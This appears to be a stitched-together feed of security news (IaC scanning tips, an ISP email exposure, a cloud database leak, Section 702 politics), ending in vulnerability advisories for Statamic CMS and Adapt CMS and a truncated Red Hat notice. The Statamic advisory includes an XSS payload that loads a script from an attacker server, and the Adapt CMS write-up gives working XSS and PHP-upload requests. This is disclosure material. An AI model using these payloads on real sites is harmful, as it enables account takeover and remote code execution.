By Uzair Amir
Infrastructure-as-code (IaC) continues to gain traction and is even hailed for having changed software development towards greater efficiency…
This is a post from HackRead.com Read the original post: 5 Ways to Maximize the Impact of IaC Scans

Infrastructure-as-code (IaC) continues to gain traction and is even hailed for having changed software development towards greater efficiency and shared responsibilities between the development and operations teams. It is revolutionizing modern IT, especially given the growing prominence of cloud computing.

Simply switching to IaC, however, does not automatically result in benefits, given the rampancy of security vulnerabilities and cyber attacks designed to exploit IaC issues. That’s why it’s crucial to scan your IaC code for possible security vulnerabilities. Organizations that embrace Infrastructure-as-Code need thorough scanning to ensure that the code works as intended and has no issues that can enable or facilitate cyber attacks.

Here are a few ways to maximize the sought-after benefits of IaC scans and ensure that adopting code-based management and provisioning of infrastructure does not become an additional security challenge.

****Integrating Security into CI/CD Pipelines****

One of the most important steps in ensuring that whichever IaC scanning solutions you use are optimized to deliver the best outcomes is to integrate them with your continuous integration and continuous deployment (CI/CD) pipelines. As organizations adopt DevOps, it only makes sense to incorporate security mechanisms into CI/CD.

This integration enables the following key benefits: the early detection of vulnerabilities, minimizing lag times in the feedback loop, the consistent enforcement of security policies, and continuous security monitoring. Merging security with your CI/CD pipelines propagates the enforcement of security measures and the impact of security controls on the same areas the CI/CD pipelines reach. This eliminates the need to painstakingly identify the coverage of security solutions and configure tools accordingly.

Additionally, having the policy of integrating security and CI/CD pipelines supports collaboration between DevOps and security teams. This makes it inevitable for security, development, and operations teams to proactively work together to configure infrastructure efficiently and securely and address challenges together.

****Continuous Scanning****

Cybersecurity pundits often include continuous security validation in their recommendations to ensure protection against cyber threats. This extends to the security of IaC.

Given the growing aggressiveness and sophistication of cyber attacks, it is not enough to rely on periodic or regular checks. Cybercriminals are getting faster at exploiting security vulnerabilities. Leaving any window of opportunity for attacks to happen can lead to disastrous consequences.

It is advisable to employ automated IaC scanning tools to make sure that vulnerabilities are spotted and addressed as promptly as possible. These tools can continuously examine code repositories, configuration files, as well as deployment scripts to detect possible security issues and bring them to light for appropriate action – before cybercriminals discover and take advantage of them.

****Adhering to Compliance Requirements****

Some might see this advice as hackneyed and ambiguous, but it is important to emphasize the value of best practices and complying with cybersecurity regulations. If the idea of best practices sounds vague, it helps to turn to authoritative cybersecurity information sources like the OWASP IaC security cheat sheet. There are many sources of useful cybersecurity guides and insights to make Infrastructure-as-Code secure and reliable.

When it comes to cybersecurity regulations, none directly target IaC practices. However, IaC management is indirectly covered by existing regulations such as the Payment Card Industry Data Security Standard (PCI DSS) and the General Data Protection Regulation (GDPR) that impose requirements on having security controls over infrastructure components configured and managed via IaC.

IaC scanning tools that do not have features which align with the standards described in best practices and regulatory requirements are not worth using. If these tools have the necessary functions, it is also important to properly configure or activate them in line with what best practices and regulations indicate.

****Prioritizing Remediation****

Current technologies afford the ability to conduct continuous security scanning and address some issues automatically. However, not all issues can be properly remedied automatically. Human involvement is still required to resolve complex concerns detected in your IaC code. IaC tools can raise an endless deluge of vulnerability alerts or notifications, but it’s up to the humans overseeing the security scanning to keep up.

As such, it is important to come up with a sensible prioritization plan. Some tools provide risk-based scoring systems to make it easier for people to address the most urgent issues. These are highly useful to avoid getting overwhelmed by the problem of information overload that is common in cybersecurity tools.

Take note that it is inadvisable to rely entirely on the IaC testing tools when it comes to identifying critical assets and resources. Proper and purposeful configuration is a must, and it may be necessary to seek the assistance of outside cybersecurity experts when doing this.

****Addressing the Human Weakness****

People continue to be the biggest weakness when it comes to cybersecurity. Highly sophisticated scanning solutions are essentially useless if those responsible for evaluating and managing IaC security are not well-versed with the appropriate courses of action to take. Also, without proper configuration, the best IaC scanning solutions are unlikely to provide the expected outcomes.

Hence, it is essential to invest in cybersecurity training to empower teams with the right skills and knowledge for effective security management in the context of IaC environments. Infrastructure as code engineers usually have some background in cybersecurity, but not many of them have the expertise needed, especially when it comes to the most recent threats and concerted attacks.

Development and operations teams should work together with security professionals to implement secure coding practices and formulate IaC security guidelines that address the specific needs of an organization. This collaboration helps enable more effective threat detection by fostering a culture of security awareness.

****In Summary****

Maximizing the impact of IaC scans entails the use of the right tools and people overseeing these tools with the necessary knowledge and insights. IaC scanning tools should be capable of continuous scanning, integration with CI/CD pipelines, and providing risk-based scoring systems for remediation prioritization. They should also align with best practices and regulations.

At the same time, the teams using these tools should take full advantage of their functions and have enough cybersecurity savvy and experience, which can be achieved with cybersecurity training and collaboration among the development, operations, and security teams.

1.  **The Best Ways to Automate SBOM Creation**
2.  **ARMO integrates ChatGPT to secure Kubernetes**
3.  **Kotlin app development company – How to choose**
4.  **Automated API Testing Differs from Manual API Testing**
5.  **What Are the Security Benefits of Using a Digital Signature?**

5 Ways to Maximize the Impact of IaC Scans

The Minnesota-based Internet provider U.S. Internet Corp. has a business unit called Securence, which specializes in providing filtered, secure email services to businesses, educational institutions and government agencies worldwide. But until it was notified last week, U.S. Internet was publishing more than a decade's worth of its internal email -- and that of thousands of Securence clients -- in plain text out on the Internet and just a click away for anyone with a Web browser.

The Minnesota-based Internet provider **U.S. Internet Corp.** has a business unit called **Securence**, which specializes in providing filtered, secure email services to businesses, educational institutions and government agencies worldwide. But until it was notified last week, U.S. Internet was publishing more than a decade’s worth of its internal email — and that of thousands of Securence clients — in plain text out on the Internet and just a click away for anyone with a Web browser.

Headquartered in Minnetonka, Minn., U.S. Internet is a regional ISP that provides fiber and wireless Internet service. The ISP’s Securence division bills itself “a leading provider of email filtering and management software that includes email protection and security services for small business, enterprise, educational and government institutions worldwide.”

U.S. Internet/Securence says your email is secure. Nothing could be further from the truth.

Roughly a week ago, KrebsOnSecurity was contacted by Hold Security, a Milwaukee-based cybersecurity firm. Hold Security founder **Alex Holden** said his researchers had unearthed a public link to a U.S. Internet email server listing more than 6,500 domain names, each with its own clickable link.

A tiny portion of the more than 6,500 customers who trusted U.S. Internet with their email.

Drilling down into those individual domain links revealed inboxes for each employee or user of these exposed host names. Some of the emails dated back to 2008; others were as recent as the present day.

Securence counts among its customers dozens of state and local governments, including: **nc.gov** — the official website of North Carolina; **stillwatermn.gov**, the website for the city of Stillwater, Minn.; and **cityoffrederickmd.gov**, the website for the government of **Frederick, Md**.

Incredibly, included in this giant index of U.S. Internet customer emails were the internal messages for every current and former employee of U.S. Internet and its subsidiary **USI Wireless**. Since that index also included the messages of U.S. Internet’s **CEO Travis Carter**, KrebsOnSecurity forwarded one of Mr. Carter’s own recent emails to him, along with a request to understand how exactly the company managed to screw things up so spectacularly.

Individual inboxes of U.S. Wireless employees were published in clear text on the Internet.

Within minutes of that notification, U.S. Internet pulled all of the published inboxes offline. Mr. Carter responded and said his team was investigating how it happened. In the same breath, the CEO asked if KrebsOnSecurity does security consulting for hire (I do not).

\[Author’s note: Perhaps Mr. Carter was frantically casting about for any expertise he could find in a tough moment. But I found the request personally offensive, because I couldn’t shake the notion that maybe the company was hoping it could buy my silence.\]

Earlier this week, Mr. Carter replied with a highly technical explanation that ultimately did little to explain why or how so many internal and customer inboxes were published in plain text on the Internet.

“The feedback from my team was a issue with the Ansible playbook that controls the Nginx configuration for our IMAP servers,” Carter said, noting that this incorrect configuration was put in place by a former employee and never caught. U.S. Internet has not shared how long these messages were exposed.

“The rest of the platform and other backend services are being audited to verify the Ansible playbooks are correct,” Carter said.

Holden said he also discovered that hackers have been abusing a Securence link scrubbing and anti-spam service called **Url-Shield** to create links that look benign but instead redirect visitors to hacked and malicious websites.

“The bad guys modify the malicious link reporting into redirects to their own malicious sites,” Holden said. “That’s how the bad guys drive traffic to their sites and increase search engine rankings.”

For example, clicking the Securence link shown in the screenshot directly above leads one to a website that tries to trick visitors into allowing site notifications by couching the request as a CAPTCHA request designed to separate humans from bots. After approving the deceptive CAPTCHA/notification request, the link forwards the visitor to a Russian internationalized domain name (рпроаг\[.\]рф).

The link to this malicious and deceptive website was created using Securence’s link-scrubbing service. Notification pop-ups were blocked when this site tried to disguise a prompt for accepting notifications as a form of CAPTCHA.

U.S. Internet has not responded to questions about how long it has been exposing all of its internal and customer emails, or when the errant configuration changes were made. The company also still has not disclosed the incident on its website. The last press release on the site dates back to March 2020.

KrebsOnSecurity has been writing about data breaches for nearly two decades, but this one easily takes the cake in terms of the level of incompetence needed to make such a huge mistake unnoticed. I’m not sure what the proper response from authorities or regulators should be to this incident, but it’s clear that U.S. Internet should not be allowed to manage anyone’s email unless and until it can demonstrate more transparency, and prove that it has radically revamped its security.

U.S. Internet Leaked Years of Internal, Customer Emails

By Waqas
Another day, another Cloud database leak in the wild!
This is a post from HackRead.com Read the original post: Massive Cloud Database Leak Exposes 380 Records

The researcher who discovered the database leak suspects it belongs to Zenlayer, an on-demand cloud server provider. However, uncertainty persists as the company has not provided any response or confirmation.

_Update: 20:44, Feb 14, 2024, GMT – Article updated with statement from Zenlayer spokesperson._

We’re aware of the data exposure, have patched the issue, and are engaged with the researcher who originally discovered the data leak. We’ll provide additional information when the investigation is complete.

Jeremiah Fowler, a cybersecurity researcher, stumbled upon something quite alarming: a cloud database leak allegedly belonging to the global network service provider Zenlayer, left unprotected and misconfigured. What’s even more shocking is the sheer volume of sensitive data it contained: a staggering 380 million records.

****384,658,212 records – 57.46 GB of Database****

Upon further digging into the server, the analysis revealed a disturbing truth. The leaked information wasn’t just limited to mundane details; it encompassed the company’s internal workings and, even more concerning, customer data. In total, a jaw-dropping 384,658,212 records, totaling 57.46 GB, were laid bare for all to see.

What’s truly alarming is that this treasure trove of data wasn’t safeguarded by even a basic password. It was out there in the open, accessible to anyone, including those with malicious intent. Essentially, it was a “come and take it, no questions asked” scenario, leaving the door wide open for potential exploitation by threat actors.

****Trove of Records Leaked****

Within this database, numerous servers, error, and monitoring logs were found documenting both internal operations and customer activities. While these logs play a vital role in monitoring server performance, troubleshooting issues, and ensuring system security, they also carry a potential threat.

For your information, Zenlayer is a global network services provider offering SD-WAN, CDN, and cloud services to global brands in the telecom, gaming, media, entertainment, cloud computing, and blockchain sectors. Headquartered in Los Angeles and Shanghai, it has over 290 data centres across six continents. In 2021, Financial Times ranked it third on America’s Fastest Growing Telecom Companies list.

Exposing these logs to the public eye could disclose sensitive information. What was meant to be a tool for enhancing operational efficiency and safeguarding against potential threats could quickly turn into a liability if mishandled or accessed by unauthorized individuals.

The server also contained logging records for various applications, dashboards, vendors, notifications, and security. The exposed customer data, including names and emails of authorized individuals, could be used for targeted phishing attacks or fraudulent activities. For example, attackers may pose as a Zenlayer salesperson and ask for payment or banking information.

Additionally, the database exposure not only exposed sensitive information like user roles but also disclosed internal email addresses. This data could prove invaluable for cybercriminals, facilitating scams and social engineering attacks.

With access to these emails, malicious actors could carry out phishing campaigns targeting employees, potentially leading to the disclosure of confidential data, the installation of malware, and the compromise of credentials.

****Russian Data****

Fowler’s blog post on Website Planet reveals that part of the records was data of a Russian telecom carrier company, partially owned by a sanctioned state-controlled company, accused of involvement in internet traffic hijacking, or BGP (Border Gateway Protocol) hijacking, which allows attackers to intercept, inspect, or modify network traffic.

However, Fowler clarified that he wasn’t claiming that a Zenlayer customer was involved in the BGP hijacking.

Fowler also discovered logs containing VPN records and numerous IP addresses, including controller host IP, controller IP, IP LAN, jumper IP, and PXE IPMI. These IPs may reveal the organization’s internal network architecture, potentially allowing attackers to map the network, identify targets, or plan future cyberattacks.

Nevertheless, public access was secured the day after Fowler notified Zenlayer. It is unknown if the database was being managed by Zenlayer or a third party, how long it was exposed, and who else may have gained access.

Fortunately, thanks to Fowler’s prompt responsible disclosure, the administrators managed to secure the exposed database within a day. Despite this swift action, the company failed to acknowledge or respond to the researcher’s efforts. Therefore, there remains uncertainty regarding whether the database was under Zenlayer’s direct management or handled by a third party.

****Update: 20:44, Feb 14, 2024, GMT –****

In a statement to Hackraed.com, a Zenlayer spokesperson confirmed awareness of the issue, now patched. The company is also in contact with Fowler.

> _We’re aware of the data exposure, have patched the issue, and are engaged with the researcher who originally discovered the data leak. We’ll provide additional information when the investigation is complete._
> 
> Zenlayer Spokesperson

1.  **Cigna Health Data Leak: 17 Billion Records Exposed**
2.  **7TB of Healthcare Data Leak Affects 12 Million Patients**
3.  **Researcher Exposes Crypto Scam Network of 300 Domains**
4.  **US Credit Union Service Leaks Millions of Records, Passwords**
5.  **Database Leak Exposes 500K Irish Police Vehicle Seizure Records**
6.  **Data Leak Exposes 1.5B Real Estate Records, Including Kylie Jenner**

Massive Cloud Database Leak Exposes 380 Records

Prominent advocates for the rights of pregnant people are urging members of Congress to support legislation that would ban warrantless access to sensitive data as the White House fights against it.

One of the foremost women’s advocacy groups in the United States is urging members of Congress to support a ban on government agencies using private data brokers to acquire access to Americans’ private data without a warrant, a response that came late Tuesday following explosive revelations about the surveillance of women’s health clinics across the US.

The National Partnership for Women & Families, a nonpartisan nonprofit based in Washington, DC, is pressing federal lawmakers to throw support behind an amendment this week aimed at closing off a legal loophole through which police and spy agencies routinely circumvent the courts, buying information traditionally shielded by the country’s constitution.

The organization pointed to news in Politico on Tuesday which revealed a data broker tracked people’s visits to nearly 600 reproductive health clinics in the US and put that information up for sale. Politico cites a letter from US senator Ron Wyden to the Securities and Exchange Commission calling for an investigation into the company, Near Intelligence.

“This is not only a blatant violation of privacy but a cruel attempt to force pregnant people into reproductive health decisions that they should be making for themselves,” the National Partnership told members, according to an email obtained by WIRED. “Congress needs to curtail warrantless law enforcement access to people’s data in order to prevent government monitoring of abortion and pregnancy outcomes.”

The National Partnership for Women & Families has earned praise previously from former first ladies Michelle Obama and Hillary Clinton (during the latter’s tenure as secretary of state).

The data-broker amendment aimed at preventing government agencies from circumventing warrant requirements with money has gained widespread support in Congress. Likewise, recent polling shows up to 80 percent of Americans would support its passage. It faces powerful opposition, however, from the White House, the US military, and the nation’s spy agencies, which have acknowledged purchasing domestic internet data in recent years.

In December, pro-privacy members of the House Judiciary Committee attached language that would ban government data-broker purchases of information safeguarded under the nation’s Fourth Amendment to a House bill reauthorizing Section 702, a classified surveillance program designed to target foreigners on foreign soil that also routinely sweeps up the private communications of Americans: emails, calls, and text messages in their entirety.

Roughly a week later, pro-surveillance lawmakers on the House Intelligence Committee introduced their own bill reauthorizing the 702 program, which excluded the data-broker ban as well as other reforms included in the Judiciary Committee bill. One such reform, supported by the Judiciary Committee, would force federal analysts and investigators to get a warrant before examining the communications of Americans unavoidably intercepted under the sprawling 702 program.

US House leaders had tentatively agreed to a deal that would allow the entire House to vote on both bills, passing whichever received the most support. That plan fell through, however, and before the new year, lawmakers voted instead to extend the 702 program until mid-April. An effort to proactively block the Biden administration from taking advantage of this temporary extension, circumventing Congress and getting the program reauthorized for an additional year on its own, was ultimately rejected by House speaker Mike Johnson.

As a result, most House members remain confused as to when 702 surveillance would actually end if Congress fails to take action. Reformers say fomenting a sense of urgency to salvage the spy program—ultimately deemed vital even by many of its loudest critics—mostly plays into the administration’s hand, as it serves up “what-if” scenarios concerning possible terrorist attacks to lawmakers still on the fence. A group of senior congressional aides told WIRED last month that discussions about the program have been plagued for weeks by “scare tactics” and disinformation campaigns, with intelligence officials privately using images of Hamas to imply a growing domestic threat.

Rumors have circulated about a “secret session” being called this week, a rare procedure in which Congress meets behind closed doors. The session has been reported as called off, but a source with knowledge of recent developments tells WIRED that White House national security advisers are still expected to meet privately with lawmakers—one final attempt to dissuade them from supporting privacy reforms.

Last week, House speaker Mike Johnson and House minority leader Steve Scalise privately signed off on what they’d planned to advertise as a “compromise” bill, the latest in a string of schemes aimed at preserving the 702 program with as few changes as possible. It drew immediate criticism from civil liberties organizations such as the Brennan Center for Justice, which said it had been “carefully crafted” to preserve the “status quo.” The Electronic Privacy Information Center (EPIC) said the House leadership bill was a “compromise” in name only, aligning clearly with the priorities of the spy agencies over those fighting for reform.

Multiple sources, however, say the bill ultimately gained acceptance on the condition that members of both the House Judiciary and House Intelligence Committees would be allowed to offer amendments this week that would be subject to a floor vote. The amendment supported by the National Partnership for Women & Families is destined to be among them.

Police and intelligence agencies regularly purchase millions of dollars worth of sensitive information from data brokers each year, according to a December 2021 study of public records by the Center for Democracy & Technology (CDT), a civil-liberties-focused nonprofit. This data can include phone location data and health data collected by medical apps, which could be used to identify people seeking abortion care.

The Congressional Research Service (CRS), which provides Congress with legal and policy analysis, noted in 2022 that federal law includes “relatively little constraints” on law enforcement gaining access to sensitive data, including geolocation data and health data collected by apps and fitness trackers. The lack of constraints is particularly true for information sold by data brokers, which are “generally not regulated by any specific privacy statute,” according to CRS. While abortion-related information obtained from data brokers is known to have been used by anti-abortion activists, the CRS notes that it could equally be used by police investigating violations of state-level abortion laws.

The primary federal law regulating data broker activities is the FTC Act, which gives the US Federal Trade Commission the authority to penalize companies that fail to disclose how the data they sell may be used. In January, the FTC banned X-Mode Social, a Virginia-based data broker now named Outlogic, from selling “sensitive location data” that “could be used to track people’s visits to sensitive locations such as medical and reproductive health clinics, places of religious worship, and domestic abuse shelters” after the company allegedly failed to institute “appropriate safeguards” against the use of precise location data by third parties.

In July 2022, US president Joe Biden issued an executive order instructing the FTC chair to “consider actions” that aim to further “protect consumers’ privacy when seeking information about and provision of reproductive healthcare services.” The House Judiciary Committee’s amendment, which US spy agencies oppose, would strengthen these protective efforts far beyond the remit of the FTC Act.

In a “dear colleagues” email obtained by WIRED, Jerrold Nadler, the ranking Democrat on the Judiciary Committee, and Representative Zoe Lofgren wrote Wednesday that the so-called compromise bill “closely tracks” with the demands of the intelligence community, “bypassing commonsense reforms,” including the amendment now endorsed by the National Partnership for Women & Families, which Lofgren and Nadler describe as strictly written to stop the government from “buying its way around the Fourth Amendment.”

“The implications for Americans’ privacy rights are staggering,” they said, refuting claims that the data-broker issue is unrelated to surveillance conducted under the 702 program. “It makes little sense to rein in warrantless surveillance under one authority when the government can simply fall back on other available techniques to acquire similar information.”

Section 702 Surveillance Fight Pits the White House Opposite Reproductive Rights

Statamic CMS versions prior to 4.46.0 and 3.4.17 suffer from multiple persistent cross site scripting vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240212-0 >  
=======================================================================  
               title: Multiple Stored Cross-Site Scripting vulnerabilities  
             product: Statamic CMS  
  vulnerable version: <4.46.0, <3.4.17  
       fixed version: >=4.46.0, >=3.4.17  
          CVE number: CVE-2024-24570  
              impact: high  
            homepage: https://statamic.com/  
               found: 2024-01-06  
                  by: Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Statamic is a modern, clean, and highly adaptable CMS built on Laravel  
that can run full-stack, headless, on flat files or databases, or as a  
static site generator."

Source: https://statamic.com/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately. Furthermore,  
an updated guideline for implementing a Content Security Policy (CSP) is  
provided by the vendor.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting in Forms feature (CVE-2024-24570)  
Statamic's Forms feature allows unauthenticated users to upload certain  
filetypes. While only a limited number of file extensions are allowed, it's  
possible to bypass these restrictions to upload an HTML file containing  
JavaScript code.

2) Stored Cross-Site Scripting in Link Field  
Statamic's Link Field feature provides authenticated users a convenient way  
of inserting Hyperlinks into a collection's entry. It was identified that  
it's possible to execute JavaScript code upon clicking on a specially  
crafted Hyperlink.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting in Forms feature (CVE-2024-24570)  
When trying to upload an HTML file as an unauthenticated user, the  
.html extension gets correctly detected by Statamic, leading to the file  
being blocked from uploading.

This check can be bypassed though, by instead using a .jpg file extension,  
as files of this type are allowed to be uploaded. Afterwards, the file's  
content is analyzed by Statamic and correctly interpreted as HTML, resulting  
in the initial .jpg extension being replaced with an .html extension. As no  
checks on this newly set file extension are performed, the file is now shown  
as a valid submission in Statamic's "Forms" page.

If an authenticated user accesses this submission, the included JavaScript  
code will be executed. This can be verified by uploading a file called  
"test.jpg" with the following content:

<!DOCTYPE html>  
<html>  
     <body>  
         <script>alert("Stored XSS on "+window.origin)</script>  
     </body>  
</html>

To further demonstrate the criticality of this vulnerability, the following  
JavaScript code can be used:

[ POC code removed from public advisory ]

When an admin user now accesses this JavaScript submission, the following happens:  
1. Load the "Users" page in a hidden iframe and extract the CSRF token from it.  
2. Request user information and extract the user ID and email address from  
    the response.  
3. Request a password reset code for the extracted used ID.  
4. Extract the password reset code from the response and send it to the  
    attacker server including the user's email address.

After receiving the victim's password reset code and email address,  
the attacker can now visit the following URL and set a new password:  
https://<STATAMIC_SERVER>/!/auth/password/reset/<PASSWORD_RESET_CODE>

This results in a successful takeover of the victim's account.

2) Stored Cross-Site Scripting in Link Field  
When using a Link Field of type "URL", the following XSS payload can be used  
as input:  
javascript:var js=document.createElement('script');js.src='https://<ATTACKER_SERVER>/poc.js';document.body.append(js)

As this input is typically placed in the "href" attribute of an anchor tag,  
the JavaScript pseudo protocol can be used to execute arbitrary JavaScript  
code upon clicking on the Hyperlink. In this case the external file "poc.js"  
will be loaded, which contains the JavaScript code from the password reset  
code stealer above (removed from public advisory).

This way, an authenticated user with lower privileges can gain control over an  
admin's account after the admin clicks on the malicious Hyperlink.

Statamic's "sanitize" modifier doesn't prevent this attack, as no illegal  
characters are being used in the XSS payload:  
<a href="{{ url_link | sanitize }}">Link</a>

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 4.45.0

The following Statamic CMS versions are affected by this vulnerability:  
* <4.46.0  
* <3.4.17

Vendor contact timeline:  
------------------------  
2024-01-24: Contacting vendor through support@statamic.com  
2024-01-24: Vendor confirms receipt of advisory and states that they aim to  
             resolve the issues within the next few days.  
2024-01-26: Vendor fixes the first stored XSS and shares the corresponding  
             GitHub security advisory draft. Furthermore, valid arguments for  
             mitigating the second stored XSS via a correctly set CSP are  
             supplied. Vendor also creates a new documentation page for  
             setting the CSP in the correct areas.  
2024-01-26: Confirming that setting a correctly configured CSP for the  
             necessary areas results in a higher efficiency in mitigating the  
             second security issue.  
2024-01-29: Suggesting an adjustment of the assigned CVSS3.1 score that was  
             set in the vendor's GitHub security advisory. Also asking for  
             planned public disclosure and the assignment of a CVE number.  
2024-01-29: Vendor adjusts CVSS3.1 score and suggests requesting a  
             CVE number via GitHub.  
2024-01-30: Received CVE number CVE-2024-24570.  
2024-02-12: Coordinated release of advisory.

Solution:  
---------  
The vendor provided a patch for the "Stored Cross-Site Scripting in Forms" feature  
(CVE-2024-24570):

* Update version "4.X" to "4.46.0" or later  
* Update version "3.X" to "3.4.17" or later

Get the newest release of Statamic CMS here:  
https://github.com/statamic/cms/releases

The vendor will not provide a patch regarding "Stored Cross-Site Scripting in  
Link Field" but suggests to implement a correctly configured CSP as described  
in Statamic's newly added documentation page:

https://statamic.dev/tips/content-security-policy

Vendor advisory:  
https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9

Workaround:  
-----------  
No workaround available.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Niklas Schilling / @2024

Statamic CMS Cross Site Scripting

Adapt CMS version 3.0.3 suffers from persistent cross site scripting and remote shell upload vulnerabilities.

# Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3  
# Date: 02/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.0.3  
# Tested on: Ubuntu 22.04  
# Blog: http://msecureltd.blogspot.com

 *Description*

- It was found that adaptcms v3.0.3 was vulnerable to stored cross  
site scripting

- Also the application allowed the file upload functionality to upload  
PHP files which resulted in remote code execution

*Stored XSS*

*Steps to Reproduce:*

   1. Login as admin and add a new article  
   2. In "Title" add the following payload <svg><animate  
onbegin=alert(1) attributeName=x dur=1s>  
   3. The stored XSS would be triggered upon visiting the article by  
normal user

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&*data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E*&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]

// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
[...]

[...]  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  *<title>*  
*    AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x  
dur=1s>  </title>*  
[...]

*Unrestricted File Upload*

*Steps to Reproduce:*

   1. Login as admin and visit the "Media" page  
   2. Click on "Files" then use the "Add File" functionality  
   3. In "File Contents" add the following PHP code <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

[...]  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[0][File][dir]"*

*uploads/*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][mimetype]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][filesize]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[File][content]"*

*<?php phpinfo(); ?>*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
[...]

// HTTP response

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
*Location: http://192.168.232.133/adaptcms/admin/files  
<http://192.168.232.133/adaptcms/admin/files>*  
[...]

// HTTP GET request

GET /adaptcms/uploads/*test-php.php* HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

[...]  
<h1 class="p">*PHP Version 5.6.40*</h1>  
</td></tr>  
</table>  
<table>  
<tr><td class="e">System </td><td class="v">*Linux ubuntu  
6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12  
18:54:30 UTC 2 x86_64* </td></tr>  
[...]

Adapt CMS 3.0.3 Cross Site Scripting / Shell Upload

Red Hat Security Advisory 2024-0804-03 - A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal. Issues addressed include bypass, cross site scripting, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0804.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.7 security updateAdvisory ID:        RHSA-2024:0804-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0804Issue date:         2024-02-14Revision:           03CVE Names:          CVE-2023-2976====================================================================Summary: A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on 